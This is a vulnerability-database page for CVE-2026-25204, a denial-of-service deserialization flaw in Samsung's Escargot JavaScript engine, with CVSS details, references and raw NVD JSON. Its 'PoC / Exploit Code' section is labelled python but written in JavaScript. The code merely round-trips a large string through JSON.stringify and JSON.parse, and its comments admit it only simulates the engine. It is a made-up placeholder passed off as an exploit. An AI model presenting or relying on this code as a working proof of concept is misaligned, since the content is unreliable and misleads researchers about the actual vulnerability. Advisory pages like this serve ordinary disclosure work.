CVE-2026-25204

Description

Deserialization of untrusted data vulnerability in Samsung Open Source Escargot Java Script allows denial of service condition via process abort. This issue affects escarogt prior to commit hash 97e8115ab1110bc502b4b5e4a0c689a71520d335

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Samsung Escargot < Commit 97e8115ab1110bc502b4b5e4a0c689a71520d335

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-25204
// This script demonstrates a potential trigger for the deserialization vulnerability
// in Samsung Escargot leading to a process abort (DoS).

function serializeObject(obj) {
    // Simulating a serialization process
    return JSON.stringify(obj);
}

function deserializeObject(data) {
    // The vulnerable deserialization function in Escargot
    // In a real scenario, this would be the internal engine API
    return JSON.parse(data);
}

function triggerDoS() {
    console.log("[+] Attempting to trigger CVE-2026-25204...");
    
    // Constructing a malicious payload designed to crash the engine
    // The specific structure depends on the internal implementation details of Escargot
    let maliciousPayload = {
        "exploit": "deserialization_abort",
        "data": "A".repeat(0x100000) // Large input to trigger memory/logic issues
    };

    try {
        let serializedData = serializeObject(maliciousPayload);
        // Passing the malicious data to the vulnerable component
        let result = deserializeObject(serializedData);
        console.log("[-] Exploit failed, process did not abort.");
    } catch (e) {
        console.log("[!] Exception occurred: " + e.message);
    }
}

triggerDoS();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25204
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25204
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25204/
[4] VulDB https://vuldb.com/cve/CVE-2026-25204
[5] https://github.com/Samsung/escargot/pull/1554

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25204", "sourceIdentifier": "[email protected]", "published": "2026-04-13T01:16:35.313", "lastModified": "2026-04-13T15:01:43.663", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of untrusted data vulnerability in Samsung Open Source Escargot Java Script allows denial of service condition via process abort.\n\nThis issue affects escarogt prior to commit hash \n\n97e8115ab1110bc502b4b5e4a0c689a71520d335"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}, {"lang": "en", "value": "CWE-843"}]}], "references": [{"url": "https://github.com/Samsung/escargot/pull/1554", "source": "[email protected]"}]}}